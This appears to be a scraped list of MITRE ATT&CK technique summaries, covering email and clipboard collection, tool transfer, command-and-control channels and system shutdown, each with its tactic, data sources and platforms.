Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre